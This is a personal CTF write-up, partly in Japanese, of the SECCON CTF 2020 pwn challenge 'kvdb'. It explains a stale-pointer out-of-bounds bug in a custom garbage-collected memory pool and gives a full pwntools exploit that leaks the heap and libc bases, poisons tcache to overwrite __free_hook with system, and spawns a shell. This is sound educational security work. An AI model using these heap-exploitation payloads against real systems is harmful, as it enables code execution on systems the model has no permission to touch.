



イントロ Link to this heading

いつぞや開催された SECCON CTF 2020

その pwn 問題を全部解き直すシリーズ part.3 です。前回までのエントリは以下を参照してください。

本エントリでは pwn 2solves kvdb を解いていきます。 “k"ってついてるからカーネル問かと思っていたら、カーネル問じゃありませんでした。 けど面白かったです。 独自メモリシステム問題は、頭がバグりそうになるけど、解けると楽しい。 嗚呼人生哉…

静的解析 Link to this heading

1./kvdb: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=b2278a81a0a29c6ec7f429d1992320bd5bd00ebe, for GNU/Linux 3.2.0, not stripped
2    Arch:     amd64-64-little
3    RELRO:    Full RELRO
4    Stack:    Canary found
5    NX:       NX enabled
6    PIE:      PIE enabled
7$ strings ./libc.so.6 | grep glibc | head
8glibc 2.32

Source code is attached to the distributed file. You can ADD, GET, and DELETE data of key/value structure.

Data structure Link to this heading

One key/value data is stored as below structure: struct entry:

valid means whether this data is DELETEd or not. hash is calculated from key in new_hash() and is used for searching the hashtable (htb) for the entry:

The pointers of them are stored in hashtable(structure entry *htb[0x100]). The LSB of hash is used as the key of hashtable. If the hash collides, new entry is put into root of the linked list in htb_link().

Memory Allocation Structure Link to this heading

Most of data is stored in buffer which is allocated via alloca() or calloc(). But key and value are allocated via original allocation system, which uses Garbage Collection.

Memory Pool is described as below structure: structure mpool mp:

Memory Allocation System and Garbage Collection Link to this heading

Buffer is allocated from this system via alloc():

It first check whether the rest of space is enough for requested size. Here, p->cap means the upper limit size of the memory pool. If there is no space, it calls gc(), or Garbage Collection function:

The default size of memory pool is 0x80. After estimating the size of inuse memory, it adjusts new pool size. In init_mpool(), new pool is allocated via malloc(), then p->base, p->cap, and p->inuse is updated. In migrate() function, all the entries is re-allocated in updated memory pool. Note that all the key are re-allocated, but data is re-allocated only when e->valid is true:

The last phase of gc() is to free() the old memory pool.

Vulnerabilities Link to this heading

To be honest, I couldn’t find any vulns or kinda any clues at first glance….

I guess the author of this challenge has already written author’s writeup (I think this trend is typical especially in recent Japanese CTF), but I didn’t wanna see it. And I don’t know who is the author, though I can guess ptr-yudai disaster-level pro or shift_crops world-end pro is.

Curious Parts Link to this heading

When nothing tells you, start from small doubt. The curious part 1. In db_get() which searches hashtable for the requested entry, the buffer of the entry is checked as bellow:

curious memory check in db_get()

curious memory check in db_get()

Similar check is performed also in db_reg():

curious memory check in db_reg()

curious memory check in db_reg()

Memory allocation and re-allocation should be performed in alloc() and migrate(). If they are perfect, these check wouldn’t be needed. It means that the allocation system can collapse and the entry can be in out-of-memory region.

The curious part 2. Why does this system leave deleted or migrated data unfreed. In migrate(), data which satisfies e->valid&&e->size>0 is reallocated, but is not freed. Therefore, the old data become floating-pointer and can be used to leak some info, I guess.

The curious part 3, which is a totally mistake of mine, but usefull notice. Does this system need to shrink the pool in gc()?

the memory pool can shrink

the memory pool can shrink

Yeah, this behavior itself is OK, with no problems. But this small notice led me to the exploit.

The curious part 4, why reading and writing data is performed via read() and write()? Why not fgets() or something like it. In CTF context, this often means that you can write arbitrary value regardless of NULL byte of newline(0x1A).

The vuln Link to this heading

Let these three curious parts combined. Suppose below situation:

The size of old pool is 0x800, which has a data A in it. Note that this data is at addr of 0x1xx ~ 0x2xx. Data A is DELETEd and valid flag becomes 0. This pointer still remains in hashtable. After that, old pool shrinks to the size of 0x200. Well, the head of data A is in the range of current memory pool, but its body exceeds the range of the memory pool.

What happens if we re-register data with key “A”? ent_lookup() just checks its key and doesn’t check valid flag. And after that, db_reg() checks as below:

Okay, it also does NOT check valid flag. In addition, it RE-RAISES valid flag. Next if check would pass because it only checks the head of data(e->data).

The curious parts assembles now. Yes, floating-pointer remains in hashtable after delete. Yes, weird memory check is performed and it is insufficient. Yes, the memory pool can shrink and can be placed on the old memory pool. And yes, OOB read/write is available now…!

Linear OOB to leak heapbase Link to this heading

The concept is perfect, but doing it was totally brain-fucking trial-and-error work… tcache was very annoying and inuse + ensure < new_size/4 was very irritating. key is allocated even when its valid flag is 0. And I mistakenly assumpted that new_size is evaluated multiple times in one gc() call, which wasted so much time.

Anyway, below script does well heap feng-shui. (I really hate this word heap feng-shui. It is as good as saying nothing…)

 1_put("A", 0x8-2, "A"*0x1)
 2_put("B", 0x8-2, "B"*0x1)
 3_put("C", 0x8-2, "C"*0x1)
 4_put("D", 0x8-2, "D"*0x1)
 5_put("E", 0x8-2, "E"*0x1)
 6_put("F", 0x8-2, "F"*0x1)  # inuse 0x30
 7_put("G", 0x60-2, "G"*0x4) # inuse 0x90 # cap 0x100
 9_put("H", 0x350-2, "H"*0x340) # inuse 0x3e0 # cap 0x400
10_put("A", 0x320, "A"*0x310) # inuse 0x700 # cap 0x800
19_del("H") # inuse 0x500 # use 0x8 # cap 0x800
21_put("B", 0xf0, "B"*0xe0) # inuse 0x7f0 # use 0x2f0 # cap 0x800
23_put("C", 0xf0, "C"*0x20) # inuse 0x100 # use 0xf0 # cap 0x400
    1. Allocate 0x800 pool.
    1. Allocate data “A” in 0x800 pool. Then delete it.
    1. Shrink to 0x400 and 0x800 pool is freed. It is consolidated with top chunk.

Note that data “A” is deleted but still remains in 0x800 old pool. In other word, data “A” is in top chunk. Now, chunks looks like below:

data A is in old mp(top)

data A is in old mp(top)

Then, we pad first space of old pool (top chunk) by allocating dummy entries. After some padding, we make pool shrink to the size of 0x200. Note that this pool is allocated from top chunk, or old pool. Heap would look like below:

data A is beyond current pool

data A is beyond current pool

The head of data A is actually in the current pool. However, its body is beyond the pool and exeeds to next chunk! If we allocate entry, it would be allocated right next to the current pool. Therefore, we have now overlapping chunk and OOB write access! We can write arbitrary value into the entry structure.

At this time, valid flag of A is down cuz A is already deleted. But just writing some value into A re-raises it. If we allocate one more entry, we can read its content because A is allocated for huge size. We get heapbase.

Non-linear read to leak libcbase Link to this heading

We can overwrite data and key pointer of entry structure using OOB write now. Next, we have to leak libcbase. We have to generate unsortedbin and leak its fd. Generating unsorted is easy. Re-generating 0x800 size pool and freeing it would be enough.

However, don’t forget that data and key must point to the addr in the current pool, otherwise the program dies soon:

Therefore, we have to generate unsorted and re-generate overlap data again… It was really brain-fucking work again. Finally below script works well.

 1# generate unsorted
 2_put("C", 0x3e0, "C"*0x300) # inuse 0x410 # cap #0x800
 4_put("#", 0x3e0-2, "#"*0x300)
 5_del("#") # inuse 0x7f0 # cap 0x800
 6_put("M", 0x20-2, "M"*4)
 7_del("M") # inuse 0x52 # cap 0x400
 9_put("N", 0x3a0-2, "N"*0x200)  # unsorted is generated
10_del("N") # inuse 0x3f2
11_put("O", 0x20-2, "O") # cap 0x200, again!
15_put("P", 0x190, "T") # target whose entry is on deleted A
16                      # NOTE: old A should be in base+inuse range

Now, heap looks like below:

Overwrite victim entry’s size using OOB of A. By reading A or victim data, we can leak fd of unsortedbin.

tcache poisoning to overwrite __free_hook Link to this heading

We have heapbase and libcbase, but don’t have AAW. Let’s do tcache poisoning. We use tcache 0x410 as a victim.

First, we have to free memory pool of the size 0x400 twice to link to tcache. But current heap is a little bit dirty due to previous work for leak. Unfortunately, entry structure has pointer in it and they are dereferenced in gc() and migrate() function. So they should be valid value, or the program dies. Especially data pointer is not used if its valid flag is 0, but key pointer is always dereferenced regardless of valid flag.

Below script would work:

 1# let's tcache poisoning
 6    # inuse 0x1e8 # cap 0x200
 9_put("Q", 0x300-2, "Q"*0x10) # inuse 0x349 # cap 0x400
11_put("Q", 0x3a0, "Q"*0x10) # remap # inuse 0x3db # cap 0x400
13_put("R", 0x40-2, "R"*0x10) # shrink # inuse 0x8b # cap 0x200
17# forge chunks
18fake = entry(".", 0x800, heapbase, heapbase, False).gen()
19pay = b""
20pay += b"/bin/sh\x00"
21pay += p8(0) * 0x200
22pay += (p64(0xdeadbeef) +  fake) * 0x9
23pay += p64(0x411)
24pay += p64(libcbase + 0x1eeb28 - 0x60) # free_hook - 0x60
25_put("V", len(pay), pay)
28# now, 0x410 [  2]: 0x5617d6890fa0 —▸ 0x7f97123e6b28 (__free_hook) ◂— 0x0

place /bin/sh at the head of memory pool Link to this heading

Now, __free_hook is overwriten with system. However, "/bin/sh\x00" should be at the head of the pool. The content of the pool is migrated as below at migrate():

It just lookups hashtable and migrate keys by strcpy. So we have to determine the first non-NIL entry of hashtable and give "/bin/sh\x00" for its key. In my case, it was overwritable via OOB of data A, so not difficult :)

exploit Link to this heading

風水がめんどくさすぎて、自前の libc でやって辞めちゃったけど、オフセット変えるだけだろうからこれでいいよね、いいよ。

  1#!/usr/bin/env python
  2#encoding: utf-8;
  4from pwn import *
  5import sys
  7FILENAME = "./kvdb"
  8LIBCNAME = "./libc.so.6"
 10hosts = ("kvdb.chal.seccon.jp","localhost","localhost")
 11ports = (17368,12300,23947)
 12rhp1 = {'host':hosts[0],'port':ports[0]}    #for actual server
 13rhp2 = {'host':hosts[1],'port':ports[1]}    #for localhost
 14rhp3 = {'host':hosts[2],'port':ports[2]}    #for localhost running on docker
 16binf = ELF(FILENAME)
 17libc = ELF(LIBCNAME) if LIBCNAME!="" else None
 19current_size = 0x80
 20KEYMAX = 0x40
 21DATAMAX = 0x400
 22alive = []
 24## utilities #########################################
 26def hoge(ix):
 27  global c
 28  c.recvuntil("> ")
 29  c.sendline(str(ix))
 31def _put(key, size, data):
 32  global c
 33  if len(key) > KEYMAX:
 34    print("[-] KEY is too long...")
 35    raw_input("enter to exit...")
 36    exit(0)
 37  if len(data) > DATAMAX:
 38    print("[-] DATA is too long...")
 39    raw_input("enter to exit...")
 40    exit(0)
 41  if len(data) > size:
 42    print("[-] I will kill you...")
 43    raw_input("enter to exit...")
 44    exit(0)
 45  hoge(1)
 46  c.recvuntil("Key : ")
 47  c.sendline(key)
 48  c.recvuntil("Size : ")
 49  c.sendline(str(size))
 50  c.recvuntil("Data : ")
 51  c.send(data)
 53  if key not in alive:
 54    alive.append(key)
 56def _get(key):
 57  global c
 58  hoge(2)
 59  c.recvuntil("Key : ")
 60  c.sendline(key)
 61  if "not found" in c.recvline():
 62    return None
 63  c.recvuntil("---- data ----")
 64  c.recvline()
 65  return c.recvuntil("---")[:-4]
 67def _del(key):
 68  global c
 69  hoge(3)
 70  c.recvuntil("Key : ")
 71  c.sendline(key)
 72  if "not found" in c.recvline():
 74    raise
 75  else:
 76    if key in alive:
 77      alive.remove(key)
 78    return True
 80class entry:
 81  def __init__(self, key_str, _size, _key=None, _data=None, valid=True):
 82    self.size = _size
 83    self.key_str = key_str
 84    self.key = _key
 85    self.data = _data
 86    self.hash = self.new_hash()
 87    self.valid = valid
 89  def new_hash(self):
 90    h = 5381
 91    for c in self.key_str:
 92      h = h*33 + ord(c)
 93    print("[ ] hash of " + self.key_str + ": "+hex(h&0xffffffff))
 94    return h & 0xffffffff
 96  def gen(self):
 97    pay = b""
 98    pay += p32(0x1) if self.valid else p32(0) # valid flag
 99    pay += p32(self.hash)
100    pay += p64(self.size)
101    pay += p64(self.key)  if self.key!=None else p64(0)
102    pay += p64(self.data) if self.data!=None else p64(0)
103    pay += p64(0) # next
104    return pay
108## exploit ###########################################
110def exploit():
111  global c
113  _put("A", 0x8-2, "A"*0x1)
114  _put("B", 0x8-2, "B"*0x1)
115  _put("C", 0x8-2, "C"*0x1)
116  _put("D", 0x8-2, "D"*0x1)
117  _put("E", 0x8-2, "E"*0x1)
118  _put("F", 0x8-2, "F"*0x1)  # inuse 0x30
119  _put("G", 0x60-2, "G"*0x4) # inuse 0x90 # cap 0x100
121  _put("H", 0x350-2, "H"*0x340) # inuse 0x3e0 # cap 0x400
122  _put("A", 0x320, "A"*0x310) # inuse 0x700 # cap 0x800
124  _del("A")
125  _del("B")
126  _del("C")
127  _del("D")
128  _del("E")
129  _del("F")
130  _del("G")
131  _del("H") # inuse 0x500 # use 0x8 # cap 0x800
133  _put("B", 0xf0, "B"*0xe0) # inuse 0x7f0 # use 0x2f0 # cap 0x800
134  _del("B")
135  _put("C", 0xf0, "C"*0x20) # inuse 0x100 # use 0xf0 # cap 0x400
136  _del("C")
138  #######################################
140  # struct entry's size is 0x28(0x30)
141  for i in range(0x1b0//0x30):
142    _put(p8(0x61+i), 0x1,p8(0x61+i))
143    _del(p8(0x61+i))
145  _put("?", 0x2e0-2, "?"*0x200) # inuse 0x3ef # cap 0x400
146  _del("?")
148  _put("!", 0x20-2, "!"*0x10) # YEAH! overlapping! # cap 0x200
149  _del("!")
151  _put("T", 0x190, "T") # target whose entry is on deleted A
152                        # NOTE: old A should be in base+inuse range
155  ##############################
157  T = entry("T", 0x800, 0xdeadbeef, 0xdeadbeef).gen()
158  U = entry("U", 0x800, 0xdeadbeef, 0xdeadbeef).gen()
159  V = entry("V", 0x800, 0xdeadbeef, 0xdeadbeef).gen()
160  W = entry("W", 0x800, 0xdeadbeef, 0xdeadbeef).gen()
161  Z = entry("Z", 0x800, 0xdeadbeef, 0xdeadbeef).gen()
163  pay = b""
164  pay += "A"*0x3e
165  pay += p64(0xdeadc0bebeef)
166  pay += T
167  pay += p64(0xdeadc0bebeef)
168  pay += U
169  pay += p64(0xdeadc0bebeef)
170  pay += V
171  pay += p64(0xdeadc0bebeef)
172  pay += W
173  pay += p64(0xdeadc0bebeef)
174  pay += Z
175  _put("A", len(pay), "A"*0x3e + (p64(0x201f1)+p64(0))*((len(pay)-0x3e)//0x10)) # fake top size to avoid corruption
177  ############################
179  _put("U", 0x1, "U") # it's mine
180  _put("V", 0x1, "W") # it's mine
181  _put("W", 0x1, "W") # it's mine
182  _put("Z", 0x1, "Z") # it's mine
184  # now, A's valid flag is 1. So, I can read via OOB. Let's leak heapbase
185  leak = unpack(_get("A")[0x86:0x86+8])
186  heapbase = leak - 0xdb6
187  print("[!] leak: " + hex(leak))
188  print("[!] heapbase: " + hex(heapbase))
190  #############################
191  # let's generate unsorted # inuse 0x1e2 # cap 0x200
193  T = entry("T", 0x800, heapbase+0xc24, heapbase+0xc26).gen()
194  U = entry("U", 0x800, heapbase+0xdb6, heapbase+0xdb8).gen()
195  V = entry("V", 0x800, heapbase+0xdb9, heapbase+0xbe0).gen()
196  pay = b""
197  pay += "A"*12
198  pay += "U\x00"
199  pay += "U"
200  pay += "V\x00"
201  pay += "V"
202  pay += "W\x00"
203  pay += "W"
204  pay += "Z\x00"
205  pay += "Z"
206  pay += "A"*(0x3e-len(pay))
207  pay += p64(0xdeadc0bebeef)
208  pay += T
209  pay += p64(0xdeadc0bebeef)
210  pay += U
211  pay += p64(0xdeadc0bebeef)
212  pay += V
213  _put("A", len(pay), pay)
214  _del("A")
215  _del("T")
216  _del("U")
217  _del("V")
218  _del("W")
219  _del("Z")
221  print(alive) # inuse 0x1e2 # cap 0x200
222  # generate unsorted
223  _put("C", 0x3e0, "C"*0x300) # inuse 0x410 # cap #0x800
224  _del("C")
225  _put("#", 0x3e0-2, "#"*0x300)
226  _del("#") # inuse 0x7f0 # cap 0x800
227  _put("M", 0x20-2, "M"*4)
228  _del("M") # inuse 0x52 # cap 0x400
230  _put("N", 0x3a0-2, "N"*0x200)  # unsorted is generated
231  _del("N") # inuse 0x3f2
232  _put("O", 0x20-2, "O") # cap 0x200, again!
234  ###################################
236  _put("P", 0x190, "T") # target whose entry is on deleted A
237                        # NOTE: old A should be in base+inuse range
238  T = entry("T", 0x10, heapbase+0xc24, heapbase+0xc00).gen()
239  U = entry("U", 0x800, heapbase+0xdb6, heapbase+0xdb8).gen() # my spy!
240  V = entry("V", 0x800, heapbase+0xdb9, heapbase+0xbe0).gen() # my attacker!
241  pay = b""
242  pay += "A"*12
243  pay += "U\x00"
244  pay += "U"
245  pay += "V\x00"
246  pay += "V"
247  pay += "W\x00"
248  pay += "W"
249  pay += "Z\x00"
250  pay += "Z"
251  pay += "A"*(0x3e-len(pay))
252  pay += p64(0xdeadc0bebeef)
253  pay += T
254  pay += p64(0xdeadc0bebeef)
255  pay += U
256  _put("A", len(pay), pay)
258  leak = unpack(_get("U")[0x1b8:0x1b8+8])
259  libcbase = leak - 0x1ebbe0
260  print("[!] leak: " + hex(leak))
261  print("[!] libcbase: " + hex(libcbase))
264  #################################
265  # let's tcache poisoning
266  _del("A")
267  _del("U")
268  _del("O")
269  _del("P")
270      # inuse 0x1e8 # cap 0x200
271  print(alive)
273  _put("Q", 0x300-2, "Q"*0x10) # inuse 0x349 # cap 0x400
274  _del("Q")
275  _put("Q", 0x3a0, "Q"*0x10) # remap # inuse 0x3db # cap 0x400
276  _del("Q")
277  _put("R", 0x40-2, "R"*0x10) # shrink # inuse 0x8b # cap 0x200
278  _del("R")
281  # forge chunks
282  fake = entry(".", 0x800, heapbase, heapbase, False).gen()
283  pay = b""
284  pay += b"/bin/sh\x00"
285  pay += p8(0) * 0x200
286  pay += (p64(0xdeadbeef) +  fake) * 0x9
287  pay += p64(0x411)
288  pay += p64(libcbase + 0x1eeb28 - 0x60) # free_hook - 0x60
289  _put("V", len(pay), pay)
291  #################################
292  # now, 0x410 [  2]: 0x5617d6890fa0 —▸ 0x7f97123e6b28 (__free_hook) ◂— 0x0
293  # inuse 0x8b # cap 0x200
294  _put("R", 0x300-2, "R"*0x10)
295  _del("R")
297  # 0x410 [  1]: 0x7fd383c83b28 (__free_hook) ◂— 0x0
298  pay = b""
299  pay += p8(0)*(8*8-1-0x10)
300  pay += p64(libcbase + 0x55410) # system
301  pay += p8(0) * (0x310-2-len(pay))
302  _put("R", 0x310-2, pay) # free_hook -> system
303  _del("R")
305  ####################################
307  # the pool shoud start with "/bin/sh\x00"
308  _put("(", 0x100, "hoge")
312## main ##############################################
314if __name__ == "__main__":
315    global c
317    if len(sys.argv)>1:
318      if sys.argv[1][0]=="d":
319        cmd = """
320          set follow-fork-mode parent
321        """
322        c = gdb.debug(FILENAME,cmd)
323      elif sys.argv[1][0]=="r":
324        c = remote(rhp1["host"],rhp1["port"])
325      elif sys.argv[1][0]=="v":
326        c = remote(rhp3["host"],rhp3["port"])
327    else:
328        c = remote(rhp2['host'],rhp2['port'])
329    exploit()
330    c.interactive()
really brain-fucking feng-shui chall&hellip;! but interesting

really brain-fucking feng-shui chall…! but interesting

アウトロ Link to this heading

途中で頭がバグりそうになったけど、よくよく考えました。 SECCON、大分手応えの有る問題たちでした。 あれ、あと 1 問 pwn 残ってるのかな。やんなきゃかな。